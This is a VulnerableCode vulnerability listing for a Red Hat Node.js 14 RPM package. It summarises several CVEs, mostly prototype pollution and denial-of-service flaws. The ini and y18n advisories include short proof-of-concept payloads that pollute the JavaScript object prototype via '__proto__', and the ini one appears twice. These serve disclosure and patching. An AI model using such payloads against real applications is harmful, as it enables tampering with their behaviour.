VulnerableCode Package Details - pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2?arch=el7

Search for packages

Vulnerability	Summary	Fixed by
VCID-7tyw-ppyt-zqgr Aliases: CVE-2020-7788 GHSA-qqgx-2p2h-9c37	ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse ### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6. ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```	There are no reported fixed by versions.
VCID-fu8u-pxaa-43be Aliases: CVE-2020-7774 GHSA-c4w7-xm78-47vh	Prototype Pollution in y18n ### Overview The npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. ### POC ```js const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true ``` ### Recommendation Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.	There are no reported fixed by versions.
VCID-kh5k-ynnf-2bbx Aliases: CVE-2020-15366 GHSA-v88g-cgmw-v5xw	Prototype Pollution in Ajv An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)	There are no reported fixed by versions.
VCID-m4sn-7wuq-e3cd Aliases: CVE-2020-8277	A Denial of Service vulnerability was discovered in c-ares.	There are no reported fixed by versions.
VCID-v5h1-gpt1-97bj Aliases: CVE-2020-7754 GHSA-pw54-mh39-w3hc	Regular expression denial of service in npm-user-validate This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.	There are no reported fixed by versions.
VCID-zj4d-e8r7-ufg3 Aliases: CVE-2020-8287	Multiple vulnerabilities have been found in NodeJS, the worst of which could result in the arbitrary execution of code.	There are no reported fixed by versions.
VCID-ztt4-vnk7-7ycq Aliases: CVE-2020-8265	Multiple vulnerabilities have been found in NodeJS, the worst of which could result in the arbitrary execution of code.	There are no reported fixed by versions.

Vulnerability

Summary

Fixed by

VCID-7tyw-ppyt-zqgr
Aliases:
CVE-2020-7788
GHSA-qqgx-2p2h-9c37

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse ### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6. ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```